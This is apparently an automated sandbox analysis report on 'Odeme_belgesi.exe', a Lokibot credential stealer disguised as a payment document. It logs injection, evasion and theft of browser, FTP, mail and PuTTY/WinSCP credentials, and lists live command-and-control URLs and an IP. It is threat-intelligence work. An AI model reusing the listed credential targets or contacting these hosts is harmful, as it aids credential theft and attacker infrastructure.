Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Memory allocated: 2770000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Memory allocated: 2930000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Memory allocated: 4930000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Memory allocated: 5010000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Memory allocated: 6010000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Memory allocated: 6140000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Memory allocated: 7140000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Memory allocated: 7490000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Memory allocated: 8490000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Memory allocated: 9490000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Memory allocated: A6D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Memory allocated: B6D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Memory allocated: BB60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Memory allocated: CB60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Memory allocated: 5010000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Memory allocated: 6140000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Memory allocated: 7490000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Memory allocated: 8490000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Memory allocated: 9490000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Odeme_belgesi.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\Odeme_belgesi.exe TID: 6972	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe TID: 7120	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe TID: 7120	Thread sleep time: -2040000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Odeme_belgesi.exe

Code function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

1_2_00403D74

Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Thread delayed: delay time: 60000			Jump to behavior

Source: Odeme_belgesi.exe, 00000001.00000002.2914383353.0000000001268000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll_

Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\Odeme_belgesi.exe

Code function: 1_2_0040317B mov eax, dword ptr fs:[00000030h]

1_2_0040317B

Source: C:\Users\user\Desktop\Odeme_belgesi.exe

Code function: 1_2_00402B7C GetProcessHeap,RtlAllocateHeap,

1_2_00402B7C

Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\Odeme_belgesi.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Odeme_belgesi.exe

Memory written: C:\Users\user\Desktop\Odeme_belgesi.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process created: C:\Users\user\Desktop\Odeme_belgesi.exe C:\Users\user\Desktop\Odeme_belgesi.exe			Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Process created: C:\Users\user\Desktop\Odeme_belgesi.exe C:\Users\user\Desktop\Odeme_belgesi.exe			Jump to behavior

Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Queries volume information: C:\Users\user\Desktop\Odeme_belgesi.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Odeme_belgesi.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 1.2.Odeme_belgesi.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Odeme_belgesi.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Odeme_belgesi.exe.44788b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1688230207.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1688230207.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1689546707.0000000004478000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Odeme_belgesi.exe PID: 6912, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Odeme_belgesi.exe PID: 7124, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000001.00000002.2914383353.0000000001268000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Odeme_belgesi.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Odeme_belgesi.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: PopPassword		1_2_0040D069
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: SmtpPassword		1_2_0040D069

Source: Yara match	File source: 1.2.Odeme_belgesi.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Odeme_belgesi.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Odeme_belgesi.exe.44788b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1688230207.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1688230207.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1689546707.0000000004478000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	2 OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	111 Process Injection	1 Disable or Modify Tools	2 Credentials in Registry	41 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	2 Data from Local System	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Access Token Manipulation	NTDS	13 System Information Discovery	Distributed Component Object Model	Input Capture	113 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	111 Process Injection	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	3 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Odeme_belgesi.exe	55%	ReversingLabs	Win32.Trojan.Generic
Odeme_belgesi.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
solutviewmen.viewdns.net	5%	Virustotal		Browse

URLs

Source	Detection	Scanner	Link
http://alphastand.trade/alien/fre.php	14%	Virustotal	Browse
http://solutviewmen.viewdns.net/bdifygidj/five/fre.php	0%	Virustotal	Browse
http://www.ibsensoftware.com/	3%	Virustotal	Browse
http://kbfvzoboss.bid/alien/fre.php	12%	Virustotal	Browse
http://alphastand.win/alien/fre.php	12%	Virustotal	Browse
http://alphastand.top/alien/fre.php	16%	Virustotal	Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
solutviewmen.viewdns.net	45.66.231.242	true	true	5%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://kbfvzoboss.bid/alien/fre.php	true	12%, Virustotal, Browse	unknown
http://alphastand.win/alien/fre.php	true	12%, Virustotal, Browse	unknown
http://solutviewmen.viewdns.net/bdifygidj/five/fre.php	true	0%, Virustotal, Browse	unknown
http://alphastand.trade/alien/fre.php	true	14%, Virustotal, Browse	unknown
http://alphastand.top/alien/fre.php	true	16%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://solutviewmen.viewdns.net/bdifygidj/five/fre.phpwD	Odeme_belgesi.exe, 00000001.00000002.2914383353.0000000001268000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://www.ibsensoftware.com/	Odeme_belgesi.exe, Odeme_belgesi.exe, 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	3%, Virustotal, Browse	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.66.231.242	solutviewmen.viewdns.net	Germany		33657	CMCSUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1523245
Start date and time:	2024-10-01 10:54:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Odeme_belgesi.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/3@3/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 95% Number of executed functions: 88 Number of non-executed functions: 47
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
04:55:00	API Interceptor	105x Sleep call for process: Odeme_belgesi.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CMCSUS	m7DmyQOKD7.exe	Get hash	malicious	RHADAMANTHYS	Browse	45.66.231.126
	AMG Cargo Logistic.docx	Get hash	malicious	Remcos	Browse	45.90.89.98
	factura proforma .docx.doc	Get hash	malicious	Remcos	Browse	45.90.89.98
	SERVICE OR PRODUCT DESRIPTION AND COMPANY PROFILE.SCR.exe	Get hash	malicious	Remcos	Browse	45.66.231.90
	l.exe	Get hash	malicious	Unknown	Browse	45.66.231.185
	winx86.exe	Get hash	malicious	Unknown	Browse	45.66.231.185
	AWS 1301241710.docx.doc	Get hash	malicious	Remcos, PureLog Stealer	Browse	45.90.89.98
	5qcJn1lfO5.rtf	Get hash	malicious	Remcos, PureLog Stealer	Browse	45.89.247.65
	bF9JDHS47l.vbs	Get hash	malicious	Remcos	Browse	45.66.231.89
